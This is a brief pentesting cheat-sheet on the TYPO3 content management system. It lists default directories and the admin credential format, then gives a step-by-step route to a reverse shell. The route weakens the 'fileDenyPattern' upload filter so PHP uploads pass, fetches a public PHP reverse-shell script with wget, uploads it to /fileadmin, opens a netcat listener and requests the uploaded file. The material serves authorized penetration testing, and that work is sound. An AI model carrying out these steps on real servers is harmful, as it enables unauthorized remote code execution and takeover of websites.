TYPO3 Pentesting

TYPO3 is a web content management system. It can run on web servers like Apache, Nginx or IIS.

Directory Discovery

/fileadmin/
/typo3/
/typo3conf/
/typo3temp/

Default Credentials

admin:<password-specified-when-installed>

Reverse Shell (Admin Credential Required)

First, to check and edit the configuration of the uploaded file extension, go to “ADMIN TOOLS” → “Configure Installation-Wide Options” → “Backend” → “fileDenyPattern”.
Update the configuration if necessary. For example, remove “php[1-9]?”

\.(phpsh|phtml|pht|phar|shtml|cgi)(\..*)?$|\.pl$|^\.htaccess$

Next, prepare the payload for reverse shell named “shell.php”.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

Go to “FILE” → “Filelist” and upload the payload to the root of /fileadmin.
Now you need to open listener for getting the shell.

nc -lvnp 4444

Then access to “/fileadmin/shell.php”. You should get the shell.